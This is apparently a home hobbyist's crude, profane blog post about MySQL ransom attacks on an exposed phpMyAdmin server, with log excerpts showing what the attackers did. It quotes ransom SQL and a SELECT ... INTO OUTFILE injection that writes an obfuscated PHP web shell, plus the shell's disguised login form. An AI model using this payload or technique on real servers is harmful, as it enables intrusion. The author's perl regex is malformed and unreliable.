Fnord Since I have lots of time to spare I have rebuilt one of my old computers to run on my internal network to be an SQL Database and Apache2 web server. Years ago I purchased two separate "Kit" computers, that is seperate chassis, motherboards, memory sticks, and extras like network cards, video cards and so on. Since I have had some hardware failures in the interim (power supply mainly) I have merged them into one chassis using an old 32 bit MSI motherboard with 3 gig's of memory (a lot for that time!). I am using Knoppix live (DVD)version of linux but running from the DVD was slow so I tried installing it on a thumbdrive, I could not get the system to boot from the thumb drive so I have to start the boot from the DVD and then type in "knoppix fromhd=/dev/sda1 desktop=kde . It will continue booting and then run completely from the thumbdrive. When I initially transferred the operating system to the thumb drive I partitioned it into two drives, one partition for the main operating system and the other for home directories and downloads so when I reboot I have to mount the other partition to use it. The full process is this.
Fnord As stated above I set my timezone to Mountain time, start Network Time Protocol to sync to a reliable time source, make backup copies of the original configuration files copy pre-edited config files to point my apache server to use the correct document home on sda2, enable apache server to use a php file as my default web page, enable ssl for my secure web page then start the apache 2 server. I then make a backup copy of the my.cnf file and copy copy pre-edited config files for Mysql primary and secondary server.
Fnord I have also been learning how to use MySql database software and creating some random databases to practice with. I have one major database called "publications" that contain most of the books I have in various bookshelves in my house. I started with just one table in the database called 'classics' which contained the fields 'author', 'title', 'category', 'year' (year of pulication), and ISBN (International Standard Book Number). I now have over 200 books in the database. I also monitored my Apache Web server logs and noticed that there was a lot of activity, either GET requests to my Document Root or GET requests to /phpmyadmin/index.php. Phpmyadmin is a web interface to your MySql database and is enabled by default in Knoppix. MySql server also comes with no password on the root account so it's wide open. One day I tried to access the publicatins database and found it was gone. I went through my apache logs (access.log) and found someone had accessed the database and deleted it and in its place was a database called 'PLEASE_READ_ME_VVV', when I looked at it there was a ransom note demanding 0.03 bitcoin for the return of the database. I checked the MySql logs carefully and noticed the hacker/thief had checked for databases and just deleted the large databases but never copied or downloaded them. After I got through laughing my ass off I restored the database from a backup I had created some weeks earlier. Just imagine, cyber-ransom on my home computer...what the fuck did they think I had, classified information from the government? It's just a bunch of books you dumbasses! I did an 'nslookup' on the I.P. address and found the cyber-terrorists were from Sweden.
Fnord I am sorry but I seem to have gotten off track. I noticed that the same cyber-weenis came back several times in the next few weeks and stole the database again leaving the same demand. I laugh my ass off each time as I restore from a backup. I have also had other 'cyber-terrorists' or 'script kiddies' as they're mostly referred to also try to steal my databases. It's funny as they sometimes do it several times a day and delete the last ransome note left and install their own. Those fucking idiots are hacking all over each other. If i could find out their phone numbers I'd call mothers and and say 'Get that kid into internet porn of something so they don't make cyber-fools of themselves, it's really pathetic, if they run into the Russian cyber crime syndicate they could get their dicks slapped fer chrissakes' Hell, if I'm lucky it's Liz Salander trying to hack me, That would be a real kicker, a fictional character trying to hack me!.
I just looked up 'Exports from Sweden" and found Sweden's main exports seem to be 'Industrial Machinery, automobiles, paper products, iron and steel products, and books about Lizabeth Salander, the protagonist in the 'Millenial Series' and in one memorable year in Palo Alto CA it was Swedish Nannies in their early to mid twenties (Man, they were reall fuckin' FOXY!).
The command I use to get the bitcoin address and e-mail address is
perl -e 'while(<>) {if(m/bitcoin\b.*\b(\w{26,34b.*\b(\w+@\w\.\w+)\b/) {print "$1 $2\n";}}' mysql.log
The series of SQL commands I see in my log to issue the ransom demands is this
191011 7:54:43 945 Connect root@185.65.135.232 on 945 Query SET AUTOCOMMIT = 0 945 Query SET FOREIGN_KEY_CHECKS=0 945 Query SHOW DATABASES 945 Query SHOW DATABASES 191011 7:54:44 945 Query GRANT ALL PRIVILEGES ON AAA_READ_THIS_MESSAGE.* TO 'root' 945 Query DROP DATABASE IF EXISTS AAA_READ_THIS_MESSAGE 191011 7:54:46 945 Query USE AAA_READ_THIS_MESSAGE 945 Query SHOW TABLES 191011 7:54:47 945 Query CREATE TABLE aaa_read_this_now (message VARCHAR(9999)) 191011 7:54:49 945 Query INSERT INTO aaa_read_this_now(message) VALUES ('Hello. You may be surprised to see this message, but it was your bad security practices that allowed us to steal your database. If you want to restore your data, and continue using it, send 0.1 Bitcoin to 1A8kD5474D2EkzfmRhBMLWadEMTzK24GoG, and email us at recovery@yoursqldumps.com with your database IP address and transaction hash. In return, you will get the copy we have of your database.') 945 Query CREATE DATABASE IF NOT EXISTS AAA_READ_THIS_MESSAGE 945 Query SHOW WARNINGS 191011 7:54:50 945 Query USE AAA_READ_THIS_MESSAGE 945 Query CREATE TABLE aaa_read_this_now (message VARCHAR(9999))
This entry was found in the access.log file, the first and second entry shows the hacker logging into phpmyadmin as root, then the next line shown below is repeated 40 times, each entry is the same except for the UserAgent is different each time and the INTO OUTFILE has a different file location each time. As The hacker doesn't know what platform the server is running he is trying write a file to both Linux and Windows platforms in different directories.
185.61.149.22 - - [13/Oct/2019:02:46:36 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 2551 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.5 Safari/532.1"
This is taken from the MySql.log file, this is the result of the POST request to the import.php page
191013 2:46:36 1108 Connect phpmyadmin@localhost on 1109 Connect root@localhost on 1109 Query SET CHARACTER SET 'utf8mb4' 1109 Query SET collation_connection = 'utf8mb4_general_ci' 1109 Query SELECT "<?php eval(gzinflate(str_rot13(base64_decode('rUl6QuNTEP6cVfkPgy862xKQhOOAWOK0SBsKKgJRTyuVO0yOvY5d/NbdNYHe8d87u3gntoHr6Yo/EGl05tl0c2lz51RTGAvTxHPcodwwVNB2E1dGd0aSpZSHydLom6NBu9PuOjkP7Mxu DCzQDvcHh/2jo8Fe3+/vHWv9vf7gUH//8PDgwNnzPeeDJpA6ej9CXI74kNEw4XTpMlkMEz5q2i3iBil142AwOUI5HKds4o17uNJTG242mQcEKPk7J4wTD66vzmDlMFXQwhcWgMg8CBkwT+8I3R33shpAQHhYx/Mo+jv5KWZcBJ5WI2M4dbvQtXTTq9+nSjf6yXx+dp9czOb6J9gFDS4xDmPUH/dXZgEJ+BWoj D9RpLEZJkzO4TPEDlKXh/3RwmRil0dj3mTTKKXDN77vjxYp9QgdDrJ7YHYUbSBq4bFkT++5I8YuVjihzV0/pTHEhAepdHIp41q5b8YfMm+JXK6QASRBrEla5Z5Am4x7laNN5D7k+Pso0hv6YISMEWFn7V+n8xt9FRL9k6ky3GgoxauCf50HUFsFqQbWpEuiuKWlzBYny+0syOxcrAyd6ea2lMu1jSmSNzRZ/L SpbSdIBeGWFnBBw4TYwrWmXlxP3hKakKgppqVrvdfQKMQhO9hfhFwKL0Iu7dPzuT07/WYKlnLBPvwAvhMxAlDgNCd1borKdlaCLUwAxl8MPSGJm23EEPExSHqtgwoEAZ5R9TZkojKswtmum8YehrYmrnQuo3GCaiHhwMJ/iPUO5K2z3vTlN9Hwc7OAUZFa7ol4VUBG3GmR8oRwygVALd9CqF1vidzoLF/EId8 kPc+iFAslFKnPSZ5uFryE5UlKUUYSSsYJTIkdtC5dk+6ttY5Cz6azGz3H8vbDCPXQUeoXoI/qJ0HviK0OJp4tNI10emyc2cp+GypRatWJSKavhEtmWHLmTSrBsYMIXkxhKrgvKs9l18XGAxy3BPaTg3GfGv4C2iYujTo1tsq0zaaz2enF+VrsvTeeem3mJ9gQVFgSdPzB2LR/E758KWLBOpNPINL49i0GQiLX 97FAKgj1wHwbJ1hJlWtJno9L9YUR9/ax8L0oCB5leaHXyWJWuldgB+I8YDy8HfeUYLxD7a3r5tQWGRaPnCGivSTcxlqKLUMKDEwnpkNet9yyzPbKMjuSH6JBrgXWEPLQswq0+AEXEnJmmMjfsqqyfEFy3FusiX7T2fJhDOWlqTSzJkf1mRYV23av+8xXtBkk5DYquZvjPuOU4hNwCLV60HttPa2F3pZHjFUi9 VkM/aCmJj5Xa0ETaN6uQBp65EIz3bCo6mH+rUjWWJQ/fnw1zgj1baTVj6pemXW99q54orY0Y3HOLFqbfP0a/JzGsSPGK5Xy6gigZGWP75kcADQ39rS6Zyab+02uYzS4ZqJcrmJEX80I+qjOFN84BRHnEQ8zHC6l3o7nY6dxXrojvPkPF8quiVpGukS8RQ1igtDzVUWwSA9G3SHRtgtk2cW14swjhfZIFudxJa 2HQyVEwRfRR9aD98U5xROngRtu57O4RjNDJAuZtuDr2CqHeOGtj1uqvRYpqQ8HxXlDdcTe/50NXhoNNpe8JZhuxfA0zzJ5kegWrgwxI13MtqG/De9ZRkFW+h+n57oaFU3fUlTHdEJ/bkepEPpB8IjBQeS8iI8+/ws=')))); ?>" INTO OUTFILE 'd:/xampp/htdocs/2A507B9AC22677AE88CFADF55E01C9B3.php' 1109 Query SHOW VARIABLES LIKE 'language' 1109 Quit 1108 Quit
As seen in the above SELECT statement the object of this is to create a php file named 2A---9B3.php, once this is done the GET request shown below (also taken from the access.log) is issued.
185.61.149.22 - - [13/Oct/2019:02:46:36 -0600] "GET /2A507B9AC22677AE88CFADF55E01C9B3.php HTTP/1.1" 404 528 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; YComp 5.0.2.6)"
If you execute the code above it is actually creates a web page with one item, a text input form that is invisible, the font color is the same as the background color
<h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at Port 80</address><style>input { margin:0;background-color:#fff;border:1px solid #fff; }</style><center><form method=post><input type=password name=pass></form></center>